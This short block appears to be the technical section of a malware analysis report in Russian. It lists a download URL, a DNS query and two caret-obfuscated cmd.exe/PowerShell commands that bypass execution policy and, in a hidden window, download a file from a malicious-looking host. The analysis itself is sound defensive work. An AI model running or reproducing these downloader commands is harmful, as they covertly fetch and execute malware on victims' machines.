Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^W^Er^s^h^El^L.ex^E^ -ExECu^Tio^NpO^li^cY^ ^BYPA^SS^ -NOP^ROfI^Le^ -W^I^N^dOW^St^y^L^E ^h^id^d^EN^ ^(NEW-o^bJEct ^SyS^t^Em^.Ne^T.w^e^Bcl^IEn^T).dO^w^N^l^oADFiLE^('http://www.fapoerg...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /c "pO^W^Er^s^h^El^L.ex^E^ -ExECu^Tio^NpO^li^cY^ ^BYPA^SS^ -NOP^ROfI^Le^ -W^I^N^dOW^St^y^L^E ^h^id^d^EN^ ^(NEW-o^bJEct ^SyS^t^Em^.Ne^T.w^e^Bcl^IEn^T).dO^w^N^l^oADFiLE^('http://www.fapoerg...' (со скрытым окном)